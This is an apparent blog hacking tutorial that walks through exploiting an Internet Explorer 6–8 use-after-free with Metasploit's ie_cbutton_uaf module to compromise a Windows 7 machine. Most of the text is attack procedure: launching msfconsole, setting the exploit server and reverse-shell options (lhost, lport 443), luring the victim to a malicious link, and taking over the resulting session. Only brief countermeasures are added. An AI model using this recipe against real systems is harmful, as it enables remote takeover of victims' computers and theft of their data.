Hacking Windows 7 SP1 via Microsoft Internet Explorer 8

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R3

Victim O.S : Windows 7 SP1, XP, Server

Exploit Author : eromang, mahmud ab rahman, sinn3r

Merry Christmas and Happy New Year 2013 everyone, hope all of you great and healthy and always blessed especially in this new year. Actually my holiday haven't finished 🙂 because I still have a plan to go to Harbin, China next week to view the ice festival there, it's such a blessing 🙂 ..

Anyway, last year was closed with a security news that hit Internet Explorer 6,7,8. Even the vulnerability was exist before end of the year, but it really trending in China and Taiwan. What I know that majority of internet users in China (more than 100 million) they use internet explorer for their browsing activity that's why it's hit very hard with this vulnerability.

Here's I got from metasploit about this exploit :

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CDwnBindInfo object is freed by FollowHyperlink2, but a reference is kept in CDoc.  As a result, when the reference is used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user.

Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.

Requirement :

1. Metasploit framework

2. Windows OS with Internet Explorer v 6, 7 or 8

Step by Step :

Attacker IP Address : 192.168.8.92

Victim IP Address : 192.168.8.90

1. Open your metasploit framework console (type msfconsole from terminal) and add the exploit and payload.

in the example above I can get the ie_cbutton_uaf exploit after updating mymetasploit framework database, but you also can download it directly from this link https://github.com/rapid7/metasploit–framework/blob/master/modules/exploits/windows/browser/ie_cbutton_uaf.rb

2. The next step we need to set up the needed switch to make this exploit work, but first we need to see the available options to set up for this exploit.

3. Now we need to configure the options

Description :

set obfuscate yes --> do the javascript obfuscation

set srvhost 192.168.8.92 --> set up the exploit server address

set srvport 80 --> set the port in exploit server that will be used to handle request from victim

set uripath ie --> the URI for friendly url; in this example I use ie

set lhost 192.168.8.92 --> the address for payload to connect back to attacker if exploit success

set lport 443 --> the port used for reverse connection from victim to attacker

exploit --> launch the exploit

4. The next step we need to make sure victim open the link. that already generated. In my example picture above is : Using URL : http://192.168.8.92/ie. When victim open that malicious link, the attacker will notice that.

5. To check whether new sessions created or not, you can run sessions -l command.

6. When attacker interact with that session(see picture below), then we know that it is victim machine…

We're in 🙂

Countermeasures :

1. Update your browser

2. When you feel something incorrect while visiting a webpage, just leave it don't continue

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found it was useful: